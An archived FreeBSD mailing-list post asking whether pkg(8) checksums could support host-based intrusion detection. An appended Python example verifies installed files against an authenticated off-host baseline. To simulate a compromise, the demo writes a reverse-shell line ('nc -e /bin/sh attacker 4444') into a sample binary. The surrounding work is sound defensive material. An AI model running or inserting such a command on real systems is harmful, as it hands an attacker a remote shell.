Date:      Mon, 18 Apr 2016 11:29:31 +0100
From:      Matthew Seaman <matthew@FreeBSD.org>
To:        freebsd-pkg@freebsd.org
Subject:   Intrusion Detection using pkg?
Message-ID:  <d9571b48-bea2-a791-c536-af9549166155@freebsd.org>

Dear all,

Has anybody been thinking about using pkg(8) as part of a host-based
intrusion detection system?  Particularly considering the impending
switch to packaged base for 11.0-RELEASE.

pkg(8) metadata contains the sha256 checksum of every file it has
installed except for certain config files that the user is expected to
modify themselves.  Running 'pkg check -sa' should detect anything that
has been modified since it was installed.  That's basically what a
program like tripwire does.  Unfortunately it's also very simple to run
'pkg check -ra' which would hide any local modifications. (The
assumption here is that the system has already been compromised; the
idea is to make sure that compromise doesn't go undetected.)

What is needed is a secured mechanism to compare checksums against a
tamper-proof (preferably off-line) store.  We could pull the checksum
data out of the signed package tarballs downloaded from the repo each
time we wanted to run a secure check, but that depends on anyone not
running 'pkg clean -a' or else that precise package still being
available from the repo.  Plus it's a lot of work to do that /every/
time we want to scan for changes.

We don't, as far as I can tell, have any way of cryptographically
verifying that package metadata, once loaded into a repo catalogue or
the local package DB, has not subsequently been altered.  That would
entail something like creating a detached signature for every file in
each installed package, which is just the file checksum encrypted using
a trusted key-pair.  It should be possible to generate that data on a
package building system, but I don't know if the extra system load and
increased size of package metadata makes the whole idea a non-starter.

Thoughts?

	Cheers,

	Matthew
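The check Matthew describes, as an added example that is not part of the original message and not pkg(8)'s own code: a baseline of "path sha256" lines (the shape that, on my reading of pkg-query(8), `pkg query '%Fp %Fs' '*'` would print; that invocation is an assumption, not something the message states) is kept off the monitored host together with an authentication tag, the tag is verified before the baseline is trusted, and only then are the on-disk files hashed and compared. An HMAC keyed with a secret that never lives on the host stands in for the detached signature the message asks for; the file tree, contents and key below are constructed for the demonstration.

```python
"""Compare installed files against a baseline held off the host.

Constructed example. The baseline format ("path sha256" per line) is what
'pkg query "%Fp %Fs"' is assumed to emit; the HMAC is a stand-in for a
detached signature made with a key-pair the host never holds. Because the
local package DB can be rewritten with 'pkg check -ra', nothing here reads
it: the only trusted input is the off-box baseline plus its tag.
"""
import hashlib
import hmac
import os
import tempfile

BLOCK = 1 << 16


def sha256_file(path):
    """Stream a file through SHA-256 and return the hex digest."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(BLOCK), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root, rel_paths):
    """Emit sorted 'path sha256' lines for the given files under root."""
    lines = []
    for rel in sorted(rel_paths):
        lines.append("%s %s" % (rel, sha256_file(os.path.join(root, rel))))
    return "\n".join(lines) + "\n"


def parse_baseline(text):
    """Map path -> expected digest; the digest is the last space-separated field."""
    expected = {}
    for line in text.splitlines():
        if line.strip():
            path, digest = line.rsplit(" ", 1)
            expected[path] = digest
    return expected


def authenticate(text, key):
    """Tag the baseline with a key that is kept off the monitored host (assumed)."""
    return hmac.new(key, text.encode(), hashlib.sha256).hexdigest()


def baseline_is_authentic(text, key, tag):
    return hmac.compare_digest(authenticate(text, key), tag)


def check_files(expected, root):
    """Hash every baselined file and classify it as ok, modified or missing."""
    report = {"ok": [], "modified": [], "missing": []}
    for rel, digest in sorted(expected.items()):
        full = os.path.join(root, rel)
        if not os.path.exists(full):
            report["missing"].append(rel)
        elif sha256_file(full) != digest:
            report["modified"].append(rel)
        else:
            report["ok"].append(rel)
    return report


def demo():
    """Build a tree, snapshot it, tamper with it, then run the off-box check."""
    key = b"constructed off-line key, never stored on the monitored host"
    files = {  # constructed sample "installed" files
        "bin/hello": b"#!/bin/sh\necho hello\n",
        "lib/libfoo.so": b"\x7fELF constructed library body\n",
        "etc/foo.conf": b"# constructed config\n",
    }
    with tempfile.TemporaryDirectory() as root:
        for rel, data in files.items():
            full = os.path.join(root, rel)
            os.makedirs(os.path.dirname(full), exist_ok=True)
            with open(full, "wb") as f:
                f.write(data)
        baseline = build_baseline(root, files)      # taken while the host is clean
        tag = authenticate(baseline, key)           # stored off-box with the baseline

        # Simulated compromise: backdoor a binary and remove a library.
        with open(os.path.join(root, "bin/hello"), "wb") as f:
            f.write(b"#!/bin/sh\nnc -e /bin/sh attacker 4444\n")
        os.remove(os.path.join(root, "lib/libfoo.so"))

        # The attacker also rewrites the baseline to match the new binary,
        # as 'pkg check -ra' would do for the local DB; the tag rejects it.
        old = parse_baseline(baseline)["bin/hello"]
        new = sha256_file(os.path.join(root, "bin/hello"))
        forged = baseline.replace(old, new)

        report = check_files(parse_baseline(baseline), root)
        return {
            "authentic": baseline_is_authentic(baseline, key, tag),
            "forged_rejected": not baseline_is_authentic(forged, key, tag),
            "ok": report["ok"],
            "modified": report["modified"],
            "missing": report["missing"],
        }


if __name__ == "__main__":
    print(demo())
```

The scan cost is one SHA-256 pass per baselined file, the same work `pkg check -sa` already does; what changes is that the expected digests come from a store the host cannot rewrite, so a local `pkg check -ra` no longer hides anything. Config files pkg(8) does not checksum would need to be baselined separately or excluded as here.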







Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?d9571b48-bea2-a791-c536-af9549166155>